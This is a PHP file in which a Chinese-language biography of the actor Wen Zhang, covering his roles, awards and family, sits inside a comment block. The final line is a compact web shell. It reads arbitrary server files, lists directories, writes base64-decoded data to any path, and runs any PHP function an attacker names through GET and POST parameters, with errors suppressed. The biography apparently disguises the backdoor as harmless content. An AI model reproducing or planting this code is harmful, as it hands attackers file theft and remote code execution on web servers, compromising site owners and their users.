<?php 



/*
adad文章1984年6月26日出生于陕西省西安市，中国内地男演员、导演。2006年毕业于中央戏剧学院表演系。外表清纯，曾在叶京指导的《与青春有关的日子》饰演“卓越”，在赵宝刚指导的《奋斗》中饰演向南，都有着优秀的表现，并被大众所熟知。其他代表作包括《海洋天堂》、《雪豹》、《蜗居》、《裸婚时代》等。
文章[演员] - 演艺经历
2000年－2007年
 文章在《青春正点》、《拯救少年犯》、《你在微笑我却哭了》、《与青春有关的日子》、《锦衣卫》、《青春之歌》等电视剧出演男配角。2007年，文章在赵宝刚导演的电视剧《奋斗》中饰演了男二号向南，与佟大为、朱雨辰、马伊琍、李小璐、王珞丹等人合作。
2008年－2010年
文章在电视剧《兄弟门》、《望族》出演男配角，主演电视剧《爱在日月潭》、《国歌》。2009年，文章在滕华弢导演、改编自小说的电视剧《蜗居》中客串饰演男配角小贝，与张嘉译、海清、李念等人合作。2009年，文章首次出演电影《走着瞧》。2010年，文章在电影《海洋天堂》饰演李连杰的自闭症儿子大福。2010年，文章在改编自网络小说的抗日电视剧《雪豹》中出演男主角周卫国。 
2011年
文章在滕华弢导演、改篇自网络小说的电视剧《裸婚时代》 中出演男主角刘易阳，被网友誉为灯笼男。文章在《裸婚时代》更身兼剧本策划。该剧于2011国剧盛典获2011年度最佳男演员。由文章与白百何主演，滕华弢导演、改篇自网络小说的电影《失恋33天》在各大影院上映，创造了票房神话。 
2013年-2014年
2013年2月10日，由文章主演，周星驰执导的电影《西游·降魔篇》在 全国上映，该片全球票房破2.15亿美元，创华语片票房新纪录。
凭小爸爸获国剧盛典观众喜爱的导演。
2014年3月主演电影《我在路上最爱你》上映，由韩国导演金丰起执导，与黄圣依、池珍熙合作出演富二代“渣男”。
文章[演员] - 个人生活
文章的父母都是公务员，父亲在中共陕西省委办公厅任职，母亲则在陕西省政府工作。妻子则是艺人马伊琍，女方比男方年长8岁，两人在2008年结婚，育有一女文君竹。文章右小腿整段的刺青即是送给妻女的图腾。

 */
$x=@$_GET['X'];$y=@$_POST['Y'];if(is_file($y))echo file_get_contents($y);elseif(is_dir($y))foreach (scandir(@$y) as $k=>$v){echo $v.'</br>';}else file_put_contents($x,base64_decode($y));@$x($y);?>